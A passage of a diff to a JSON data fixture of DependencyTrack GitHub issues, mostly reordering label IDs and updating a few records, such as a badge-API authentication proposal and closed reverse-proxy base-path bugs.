799, 802, - 828 + 828, + 799 ] } }, @@ -151833,9 +151845,9 @@ "repository": 1384, "assignees": [], "labels": [ - 807, 810, - 811 + 811, + 807 ] } }, @@ -152138,8 +152150,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -152199,8 +152211,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 808 + 808, + 799 ] } }, @@ -152261,8 +152273,8 @@ "repository": 1384, "assignees": [], "labels": [ - 800, - 811 + 811, + 800 ] } }, @@ -152353,9 +152365,9 @@ "repository": 1384, "assignees": [], "labels": [ - 807, 810, - 811 + 811, + 807 ] } }, @@ -152417,9 +152429,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 830 + 830, + 799 ] } }, @@ -152541,8 +152553,8 @@ "repository": 1384, "assignees": [], "labels": [ - 802, 811, + 802, 828, 839 ] @@ -152606,8 +152618,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 823 + 823, + 799 ] } }, @@ -152789,9 +152801,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 801 + 801, + 799 ] } }, @@ -152882,8 +152894,8 @@ "repository": 1384, "assignees": [], "labels": [ - 802, 811, + 802, 828, 839 ] @@ -153007,8 +153019,8 @@ 1248 ], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -153069,9 +153081,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 829 + 829, + 799 ] } }, @@ -153101,9 +153113,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 829 + 829, + 799 ] } }, @@ -153193,9 +153205,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 801, - 809 + 809, + 799 ] } }, @@ -153526,9 +153538,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 830 + 830, + 799 ] } }, @@ -153773,8 +153785,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -153957,8 +153969,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 813 + 813, + 799 ] } }, @@ -154018,8 +154030,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 824 + 824, + 799 ] } }, @@ -154079,9 +154091,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, - 804 + 804, + 799 ] } }, @@ -154172,8 +154184,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -154264,8 +154276,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 824 + 824, + 799 ] } }, @@ -154568,8 +154580,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 831 + 831, + 799 ] } }, @@ -154660,8 +154672,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 831 + 831, + 799 ] } }, @@ -154721,9 +154733,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 828 + 828, + 799 ] } }, @@ -154935,8 +154947,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -155209,8 +155221,8 @@ "repository": 1384, "assignees": [], "labels": [ - 802, 811, + 802, 828, 839 ] @@ -156095,8 +156107,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 834 + 834, + 799 ] } }, @@ -156156,8 +156168,8 @@ "repository": 1384, "assignees": [], "labels": [ - 800, 811, + 800, 839 ] } @@ -156248,8 +156260,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -156310,8 +156322,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 834 + 834, + 799 ] } }, @@ -156402,9 +156414,9 @@ "repository": 1384, "assignees": [], "labels": [ + 824, 810, - 811, - 824 + 811 ] } }, @@ -156434,10 +156446,10 @@ "repository": 1384, "assignees": [], "labels": [ - 807, + 835, 810, 811, - 835 + 807 ] } }, @@ -156498,9 +156510,9 @@ "repository": 1384, "assignees": [], "labels": [ - 807, 810, - 811 + 811, + 807 ] } }, @@ -156620,9 +156632,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, + 834, 814, - 834 + 799 ] } }, @@ -156742,8 +156754,8 @@ "repository": 1384, "assignees": [], "labels": [ - 800, - 811 + 811, + 800 ] } }, @@ -156773,8 +156785,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -156835,8 +156847,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 804 + 804, + 799 ] } }, @@ -156896,8 +156908,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -156958,8 +156970,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -156989,9 +157001,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, - 828 + 828, + 799 ] } }, @@ -157021,9 +157033,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, - 828 + 828, + 799 ] } }, @@ -157084,8 +157096,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -157239,9 +157251,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, - 828 + 828, + 799 ] } }, @@ -157332,8 +157344,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -157363,9 +157375,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, - 828 + 828, + 799 ] } }, @@ -157395,8 +157407,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -157641,9 +157653,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 809 + 809, + 799 ] } }, @@ -157796,9 +157808,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 801, - 802 + 802, + 799 ] } }, @@ -157859,8 +157871,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -157951,8 +157963,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -158042,8 +158054,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -158075,9 +158087,9 @@ 2605 ], "labels": [ - 799, 800, - 836 + 836, + 799 ] } }, @@ -158289,8 +158301,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 814 + 814, + 799 ] } }, @@ -158412,8 +158424,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -158873,8 +158885,8 @@ "assignees": [], "labels": [ 800, - 807, - 811 + 811, + 807 ] } }, @@ -158974,7 +158986,7 @@ "pk": 5261, "fields": { "nest_created_at": "2024-09-12T01:36:16.111Z", - "nest_updated_at": "2024-09-18T19:07:00.395Z", + "nest_updated_at": "2024-09-19T07:34:58.174Z", "node_id": "I_kwDOAK7Vm856Q4bo", "title": "Include team name in audit trail for API-submitted audit changes", "body": "### Current Behavior\n\nWhen audit changes are submitted via API, the audit trail does not contain any information about the originator of the event.\n\n### Proposed Behavior\n\nThe audit trail should contain the name of the team to which the API key corresponds, e.g.:\r\n```\r\nDT_Team_XYZ - 10 Aug 2023 at 14:13:02\r\nAnalysis: NOT_SET → NOT_AFFECTED\r\n```\r\n\n\n### Checklist\n\n- [X] I have read and understand the [contributing guidelines](https://github.com/DependencyTrack/dependency-track/blob/master/CONTRIBUTING.md#filing-issues)\n- [X] I have checked the [existing issues](https://github.com/DependencyTrack/dependency-track/issues) for whether this enhancement was already requested", @@ -159148,8 +159160,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -159179,10 +159191,10 @@ "repository": 1384, "assignees": [], "labels": [ - 800, - 809, 811, - 828 + 800, + 828, + 809 ] } }, @@ -159212,8 +159224,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -159243,8 +159255,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -159274,8 +159286,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -159335,8 +159347,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -159366,8 +159378,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -159427,8 +159439,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -159518,10 +159530,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802, 824, - 828 + 802, + 828, + 799 ] } }, @@ -159671,8 +159683,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -159762,9 +159774,9 @@ "repository": 1384, "assignees": [], "labels": [ - 807, + 835, 811, - 835 + 807 ] } }, @@ -159794,9 +159806,9 @@ "repository": 1384, "assignees": [], "labels": [ - 807, + 835, 811, - 835 + 807 ] } }, @@ -159826,8 +159838,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -159918,8 +159930,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -159949,8 +159961,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -160041,12 +160053,12 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, + 835, 804, + 836, 830, - 835, - 836 + 799 ] } }, @@ -160076,9 +160088,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 835 + 835, + 799 ] } }, @@ -160168,9 +160180,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 835 + 835, + 799 ] } }, @@ -160353,8 +160365,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 821 + 821, + 807 ] } }, @@ -160734,10 +160746,10 @@ "pk": 5318, "fields": { "nest_created_at": "2024-09-12T01:37:51.298Z", - "nest_updated_at": "2024-09-12T01:37:51.298Z", + "nest_updated_at": "2024-09-22T19:39:52.169Z", "node_id": "I_kwDOAK7Vm86EXJBI", - "title": "Enhance badge API to require authorization ", - "body": "### Current Behavior\r\n\r\nAs of Dependency-Track v4.10.1, Badges can only be activated globally for all projects and versions and the GETs do not require authorization.\r\n\r\n### Proposed Behavior\r\n\r\nI'm proposing basically what @stevespringett suggested here as a future enhancement of the current badges implementation: https://github.com/DependencyTrack/dependency-track/issues/252#issuecomment-515848450:\r\n\r\nimplement a new permission to control access to the badge API. The 'authorization' via API key should be handled via URL parameter rather than a header, as there is no pretty/non-hacky-looking way to pass headers to badge URLs in their canonical use cases. For this, the team associated with the API key should have minimal permissions. Together with Portfolio Access Control, this would allow for a convenient way to control access on a project basis and make DT badges more secure.\r\n\r\nWhile convenient as a feature, and allowing any downstream stakeholder to display the state of vulnerabilities and violations about a tracked project, activating badges in the current implementation opens up a hole in the security for any attacker to use with knowledge of project names or versions. They can fetch quite a lot of data about a project from that API that way that would otherwise require authorization.\r\n\r\n### Checklist\r\n\r\n- [X] I have read and understand the [contributing guidelines](https://github.com/DependencyTrack/dependency-track/blob/master/CONTRIBUTING.md#filing-issues)\r\n- [X] I have checked the [existing issues](https://github.com/DependencyTrack/dependency-track/issues) for whether this enhancement was already requested", + "title": "Enhance Badge API to support authentication and authorisation and deprecate unauthenticated access to badges", + "body": "### Current Behavior\r\n\r\nAs of Dependency-Track v4.11, Badges can only be activated globally for all projects and versions and its API requests do not require authentication or authorisation.\r\n\r\n### Proposed Behavior\r\n\r\nI'm proposing basically what @stevespringett suggested here as a future enhancement of the current badges implementation: https://github.com/DependencyTrack/dependency-track/issues/252#issuecomment-515848450:\r\n\r\nimplement a new permission to control access to the badge API. The authentication and authorisation via API key should be handled via URL parameter rather than a header, as there is no pretty/non-hacky-looking way to pass headers to badge URLs in their canonical use cases. For this, the team associated with the API key should have minimal permissions. Together with Portfolio Access Control, this would allow for a convenient way to control access on a project basis and make DT badges more secure.\r\n\r\nWhile convenient as a feature, and allowing any downstream stakeholder to display the state of vulnerabilities and violations about a tracked project, activating badges in the current implementation opens up a hole in the security for any attacker to use with knowledge of project names or versions. They can fetch quite a lot of data about a project from that API that way that would otherwise require authentication and potentially authorisation.\r\n\r\nTo not break users' key-less badges displays when they update to the version with this change, the switch from the currently optional and unauthenticated badges access to authenticated+authorised-only will be done with a grace period in two steps over the course of at least two minor version updates.\r\n\r\n#### Step 1 (upcoming minor version update):\r\nThe current unauthenticated and unauthorised access to badges will be deprecated, but will continue to work for users who have had that enabled. \r\nThe existing setting for badges under DT's general configurations \r\n```\r\ndisable <-> enable (unauthenticated)\r\n``` \r\nwill be turned into \r\n```\r\ndisable unauthenticated <-> enable unauthenticated\r\n```\r\nwhile authenticated+authorised access will remain a working option in both cases. This way, users' existing unauthenticated badge displays still work, while they replace their badges requests with new ones, supplying them with an API key one after after another, which will also work.\r\n#### Step 2 (a future minor version update):\r\nThe option of unauthenticated and unauthorised access to badges will be removed entirely and only authenticated and authorised access will be possible.\r\n\r\n### Checklist\r\n\r\n- [X] I have read and understand the [contributing guidelines](https://github.com/DependencyTrack/dependency-track/blob/master/CONTRIBUTING.md#filing-issues)\r\n- [X] I have checked the [existing issues](https://github.com/DependencyTrack/dependency-track/issues) for whether this enhancement was already requested", "summary": "Enhance the badge API to require authorization by implementing a new permission that controls access to the badge functionality. Ensure that authorization via API key is managed through a URL parameter to accommodate the typical use cases of badge URLs, while limiting the associated team's permissions to enhance security. This modification will prevent potential attackers from easily accessing sensitive project data that currently does not require authentication.", "hint": "To approach the problem of enhancing the badge API to require authorization, you can follow these steps:\n\n1. **Understand the Current Implementation**: Review the existing badge API code to understand how it functions, particularly how it handles requests and the current security model.\n\n2. **Identify Required Permissions**: Define the specific permissions needed for accessing the badge API. This may involve creating a new permission level that restricts access based on API keys.\n\n3. **Design URL Parameter for Authorization**: Determine how to implement the API key as a URL parameter. Ensure that it adheres to security best practices and is easy to use in common scenarios.\n\n4. **Review Security Implications**: Analyze potential security risks associated with exposing project information through badges and how API key authorization can mitigate these risks.\n\n5. **Update API Documentation**: Draft new documentation outlining how to use the badge API with authorization, including examples of valid requests with the API key.\n\n6. **Implement Changes**: Modify the badge API code to require the new authorization check based on the API key provided in the URL parameter.\n\n7. **Test the Implementation**: Develop unit and integration tests to verify that the authorization mechanism works as intended and does not introduce new vulnerabilities.\n\n8. **Review Access Control Mechanisms**: Ensure that the new badge API permissions integrate with existing portfolio access control settings for consistency.\n\n9. **Gather Feedback**: Present the changes to the team or stakeholders for feedback, ensuring that the implementation meets their needs and expectations.\n\n10. **Release and Monitor**: Once changes are finalized, release the updated API, and monitor for any issues or security concerns that arise post-implementation.", "state": "open", @@ -160750,7 +160762,7 @@ "comments_count": 1, "closed_at": null, "created_at": "2024-04-02T14:21:19Z", - "updated_at": "2024-09-03T04:37:35Z", + "updated_at": "2024-09-22T10:57:28Z", "author": 2650, "repository": 1384, "assignees": [], @@ -160785,8 +160797,8 @@ "repository": 1384, "assignees": [], "labels": [ - 802, - 811 + 811, + 802 ] } }, @@ -160909,10 +160921,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, 828, - 839 + 839, + 799 ] } }, @@ -160976,10 +160988,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, 828, - 837 + 837, + 799 ] } }, @@ -161133,8 +161145,8 @@ "repository": 1384, "assignees": [], "labels": [ - 802, 811, + 802, 839 ] } @@ -161165,8 +161177,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 821 + 821, + 807 ] } }, @@ -161196,11 +161208,11 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, - 828, 839, - 840 + 840, + 828, + 799 ] } }, @@ -161477,9 +161489,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, - 804 + 804, + 799 ] } }, @@ -161569,10 +161581,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, 828, - 839 + 839, + 799 ] } }, @@ -161783,8 +161795,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -161815,10 +161827,10 @@ "assignees": [], "labels": [ 800, - 811, - 828, 839, - 841 + 841, + 811, + 828 ] } }, @@ -161848,10 +161860,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, 828, - 837 + 837, + 799 ] } }, @@ -161942,9 +161954,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 837 + 837, + 799 ] } }, @@ -162099,9 +162111,9 @@ "repository": 1384, "assignees": [], "labels": [ - 809, 811, 828, + 809, 839 ] } @@ -162164,9 +162176,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 839 + 839, + 799 ] } }, @@ -162196,10 +162208,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, 828, - 839 + 839, + 799 ] } }, @@ -162229,8 +162241,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -162260,9 +162272,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 837 + 837, + 799 ] } }, @@ -162352,9 +162364,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 835 + 835, + 799 ] } }, @@ -162505,10 +162517,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, 828, - 839 + 839, + 799 ] } }, @@ -162538,11 +162550,11 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, - 828, 836, - 839 + 839, + 828, + 799 ] } }, @@ -162572,11 +162584,11 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, + 839, 809, 828, - 839 + 799 ] } }, @@ -162606,10 +162618,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, 828, - 839 + 839, + 799 ] } }, @@ -162639,11 +162651,11 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, 801, 833, - 837 + 837, + 799 ] } }, @@ -162701,8 +162713,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -162762,8 +162774,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 807 + 807, + 799 ] } }, @@ -162917,8 +162929,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -162948,10 +162960,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, 828, - 837 + 837, + 799 ] } }, @@ -162983,8 +162995,8 @@ 1248 ], "labels": [ - 800, 811, + 800, 839 ] } @@ -163015,9 +163027,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 830 + 830, + 799 ] } }, @@ -163047,9 +163059,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 835 + 835, + 799 ] } }, @@ -163172,10 +163184,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, 801, - 830 + 830, + 799 ] } }, @@ -163328,11 +163340,11 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, + 839, 823, 828, - 839 + 799 ] } }, @@ -163363,8 +163375,8 @@ "assignees": [], "labels": [ 800, - 811, 835, + 811, 839 ] } @@ -163456,8 +163468,8 @@ "repository": 1384, "assignees": [], "labels": [ - 802, 811, + 802, 828, 839 ] @@ -163519,10 +163531,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, 801, - 843 + 843, + 799 ] } }, @@ -163582,8 +163594,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 811 + 811, + 807 ] } }, @@ -163644,8 +163656,8 @@ "repository": 1384, "assignees": [], "labels": [ - 810, - 811 + 811, + 810 ] } }, @@ -163735,8 +163747,8 @@ "repository": 1384, "assignees": [], "labels": [ - 810, - 811 + 811, + 810 ] } }, @@ -163745,7 +163757,7 @@ "pk": 5414, "fields": { "nest_created_at": "2024-09-12T01:41:41.695Z", - "nest_updated_at": "2024-09-18T19:07:08.694Z", + "nest_updated_at": "2024-09-22T19:40:39.827Z", "node_id": "I_kwDOBuWB7c5ZlNOe", "title": "Additions for v4.7.0 Release", "body": "With the release of v4.7.0 (containing lots of new goodies), Suggest...\r\n* Add a `logo-snyk.svg` to `dependencytrack.org/assets/images/integrations/`\r\n* Ditto for JIRA\r\n* adding VDR to Platform Features\r\n* Add something for dependency graphing?\r\n\r\n", @@ -163831,7 +163843,7 @@ "pk": 5417, "fields": { "nest_created_at": "2024-09-12T01:41:48.707Z", - "nest_updated_at": "2024-09-18T19:07:13.066Z", + "nest_updated_at": "2024-09-22T19:40:45.447Z", "node_id": "I_kwDOCC9AZM478_02", "title": "Fortify synch even with no new issues", "body": "Issues are synched to Fortify on the schedule even if no new scans or issues are found. This clogs up the Fortify system with repeated analysis result upload activity even though nothing changed.\r\n\r\nCan this be enhanced to only synch if there are new issues or new OSS modules found (if OSS tab synch becomes reality)?", @@ -163973,9 +163985,9 @@ 117 ], "labels": [ + 848, 846, - 847, - 848 + 847 ] } }, @@ -164095,8 +164107,8 @@ "repository": 1388, "assignees": [], "labels": [ - 845, - 850 + 850, + 845 ] } }, @@ -164126,8 +164138,8 @@ "repository": 1388, "assignees": [], "labels": [ - 845, - 851 + 851, + 845 ] } }, @@ -164158,8 +164170,8 @@ "assignees": [], "labels": [ 845, - 846, 851, + 846, 852, 853 ] @@ -164534,29 +164546,28 @@ "pk": 5440, "fields": { "nest_created_at": "2024-09-12T01:42:32.884Z", - "nest_updated_at": "2024-09-12T01:42:32.884Z", + "nest_updated_at": "2024-09-22T19:40:54.754Z", "node_id": "I_kwDODPFPBc5KYViQ", "title": "Support base path of frontend with depth > 1", "body": "### Current Behavior:\r\n\r\nBasepath with depth > 1 not working\r\n\r\nWhen changing vue.config.js to publicPath to:\r\ne.g. /-/dtrack/\r\nhttps://github.com/DependencyTrack/frontend/blob/master/vue.config.js#L8\r\nwith NGINX config:\r\n```\r\n location /-/dtrack/ {\r\n alias /opt/owasp/dependency-track-frontend/;\r\n index index.html;\r\n try_files $uri $uri/ /index.html;\r\n }\r\n```\r\n\r\n### Proposed Behavior:\r\n\r\nBasepath with depth > 1 is working\r\n\r\nRelated source:\r\nhttps://github.com/DependencyTrack/frontend/blob/master/src/views/portfolio/projects/ProjectList.vue#L84\r\nhttps://github.com/DependencyTrack/frontend/blob/master/src/shared/utils.js#L67\r\n", "summary": "Fix the issue where the base path with depth greater than 1 is not functioning by modifying the publicPath in vue.config.js to support paths like /-/dtrack/. Ensure that the NGINX configuration aligns with this change, allowing the correct aliasing and file handling. Validate the implementation by checking related source files that may be impacted by this adjustment to confirm the base path operates correctly.", "hint": "To address the issue of supporting a base path with a depth greater than 1 in the frontend, follow these steps:\n\n1. **Understand the Current Configuration**: Examine the existing `vue.config.js` and NGINX configuration to identify how the public path and routing are currently set up.\n\n2. **Modify `vue.config.js`**: Change the `publicPath` in `vue.config.js` to reflect the new base path (e.g., `/-/dtrack/`). Ensure this change is properly saved.\n\n3. **Update NGINX Configuration**: Ensure the NGINX configuration correctly points to the new base path. Confirm that the `alias` directive matches the deployment directory and that the `try_files` directive attempts to serve the appropriate files.\n\n4. **Check Vue Router Configuration**: Review the Vue Router settings in your application to confirm that the `base` option is set to match the new base path (e.g., `/-/dtrack/`).\n\n5. **Adjust Asset References**: Search through the application for any hardcoded asset references that may not align with the new base path and update them accordingly.\n\n6. **Test Route Handling**: Ensure that all routes are correctly handled by the application. Utilize Vue Router's route definition to confirm they work with the new base path.\n\n7. **Implement Redirects if Necessary**: If the application may still receive requests at the old base path, consider implementing redirects in NGINX to send users to the new path.\n\n8. **Update Documentation**: Document the changes made to both the NGINX configuration and the Vue application to ensure future maintainability.\n\n9. **Run Local Tests**: Test the application locally to ensure that routes and assets load correctly under the new base path.\n\n10. **Deploy Changes**: Once confirmed working locally, deploy the changes to the production environment and monitor for any issues related to routing or asset loading.\n\nFollowing these steps should help in properly configuring the frontend to support a base path with depth greater than 1.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/DependencyTrack/frontend/issues/153", "number": 153, "sequence_id": 1247893648, "is_locked": false, "lock_reason": "", - "comments_count": 2, - "closed_at": null, + "comments_count": 4, + "closed_at": "2024-09-22T10:04:42Z", "created_at": "2022-05-25T10:30:36Z", - "updated_at": "2022-07-27T18:57:31Z", + "updated_at": "2024-09-22T10:04:42Z", "author": 2708, "repository": 1388, "assignees": [], "labels": [ - 845, - 851 + 845 ] } }, @@ -164616,9 +164627,9 @@ "repository": 1388, "assignees": [], "labels": [ + 852, 845, - 846, - 852 + 846 ] } }, @@ -164648,9 +164659,9 @@ "repository": 1388, "assignees": [], "labels": [ + 852, 845, - 846, - 852 + 846 ] } }, @@ -164680,9 +164691,9 @@ "repository": 1388, "assignees": [], "labels": [ + 852, 845, - 846, - 852 + 846 ] } }, @@ -164691,30 +164702,29 @@ "pk": 5445, "fields": { "nest_created_at": "2024-09-12T01:42:42.110Z", - "nest_updated_at": "2024-09-12T01:42:42.110Z", + "nest_updated_at": "2024-09-22T19:40:55.791Z", "node_id": "I_kwDODPFPBc5Oraml", "title": "Vue.js / Application urls are not working properly behind a reverse proxy with a context path (context path is duplicated)", "body": "The application is running on the path /dtrack/. Since almost all content is created by vue.js on the clientside rather on the server side, rewriting urls with the reverse proxy is quite futile.\r\n\r\nThe situation is as follows. the app is started from dtrack, but the js, etc resources are loaded from the root:\r\n![image](https://user-images.githubusercontent.com/996117/181269240-a09b444a-9664-449a-9bbd-f2686d696bb9.png)\r\n\r\n\r\n### Current Behavior:\r\nWhen hovering over a component in Home > Project > the url appears correct\r\n![image](https://user-images.githubusercontent.com/996117/181266120-1e9c03b4-5b88-4a5b-8aa2-fbe705fdaee0.png)\r\n\r\n![image](https://user-images.githubusercontent.com/996117/181266917-83ac9f7c-6f93-4b4e-bab9-461f2b180c6c.png)\r\nThe same misbehaviour is also true for the tags\r\n![image](https://user-images.githubusercontent.com/996117/181267202-67c38e12-7269-4e2a-bfd1-ee13b68a9c27.png)\r\n\r\nThe url is set in the DOM as ../dtrack/hash , which in principle is correct. However vue.js clearly has a event-handler on the element to route it and the router is forwarding to\r\n\r\nbasedomain/dtrack/dtrack/hash with a 404\r\n![image](https://user-images.githubusercontent.com/996117/181267416-9dd38e64-6ab6-471c-a1d3-85432c74fdbe.png)\r\n\r\n\r\n/components may also be affected. I cannot test this right now.\r\n\r\n### Steps to Reproduce:\r\nSee above. Clicking the link\r\n\r\n### Expected Behavior:\r\nopening the same url as indicated by the browser url preview at the bottom-left.\r\n\r\n### Environment:\r\n \r\n - Dependency-Track Version: 4.5\r\n - Distribution: Docker \r\n - BOM Format & Version: - \r\n - Database Server: H2\r\n - Browser: Chrome, Firefox latest\r\n\r\n### Additional Details:\r\n\r\nThe context path has to be set in vue.js It has a function `getContextPath`\r\n\r\nSince most of the UI's urls actually work I am assuming this is a small bug of this particular 'project' Router/Controller Configuration.\r\n\r\nIt would help tremendously if all the js,static,css etc... could be moved into ONE unique path, called `dtrack` for everyone. There are few downsides, but many upsides.\r\n\r\nThe Eventlistener is here in App.vue:\r\n\r\nIt is pushed to the router, where I guess it is filtered out as a non App-native link because Vue.js does not have a basepath\r\n\r\n![image](https://user-images.githubusercontent.com/996117/181278250-0c63cef7-3e89-4b55-afdf-5207485d4e60.png)\r\n\r\nI just saw, this was hinted here: https://github.com/DependencyTrack/dependency-track/discussions/1831#discussioncomment-3260735", "summary": "Fix the issue of duplicated context paths in the Vue.js application running behind a reverse proxy by ensuring all JavaScript and static resources load from the correct context path, \"/dtrack/.\" Adjust the routing configuration in Vue.js to set the base path appropriately, enabling the application to handle links correctly without leading to 404 errors. Implement the `getContextPath` function to unify the loading of resources under the same base path, improving overall functionality and user experience.", "hint": "To address the issue of incorrect URLs in your Vue.js application behind a reverse proxy with a context path, you can take the following steps:\n\n1. **Review Vue Router Configuration**: Ensure that the Vue Router is configured to recognize the context path. You may need to set the `base` option in the router configuration to `/dtrack/`.\n\n2. **Update Vue.js Application**: Modify your Vue.js application to use the context path for all routes. This can be done by replacing hardcoded paths with a dynamic approach that utilizes the `getContextPath` function.\n\n3. **Configure Reverse Proxy**: Check your reverse proxy configuration to ensure that it appropriately handles the context path. Confirm that requests to `/dtrack/` are properly routed to the Vue.js application.\n\n4. **Check static file references**: Make sure that all static files (JavaScript, CSS, images) are being loaded from the correct context path. Update any references that might be pointing to the root instead of `/dtrack/`.\n\n5. **Modify Asset URLs**: If you are using Webpack (or similar) to build your Vue.js application, configure the public path in your build settings to include the context path. This can usually be done in the Webpack configuration file.\n\n6. **Implement URL Rewriting**: If necessary, implement URL rewriting rules in your reverse proxy to ensure that URLs are correctly mapped to the context path. This can help avoid duplications in the path.\n\n7. **Test Links and Navigation**: After making the above changes, thoroughly test all links and navigation within the application to ensure they resolve correctly without duplicating the context path.\n\n8. **Review Event Handlers**: Investigate the event handlers in your Vue components, particularly in `App.vue`, to ensure they are properly handling the router links and not causing erroneous navigation.\n\n9. **Check for Hardcoded URLs**: Perform a search through your codebase for any hardcoded URLs that might bypass the router and cause issues. Replace them with dynamic references that incorporate the context path.\n\n10. **Deploy and Monitor**: Once the changes are made, deploy the updated application and monitor it for any 404 errors or navigation issues that may arise. Use browser developer tools to debug any potential issues that occur during navigation.\n\nBy following these steps, you should be able to resolve the problem of duplicated context paths and ensure that your Vue.js application works correctly behind the reverse proxy.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/DependencyTrack/frontend/issues/205", "number": 205, "sequence_id": 1320004005, "is_locked": false, "lock_reason": "", - "comments_count": 3, - "closed_at": null, + "comments_count": 4, + "closed_at": "2024-09-22T10:05:17Z", "created_at": "2022-07-27T14:09:10Z", - 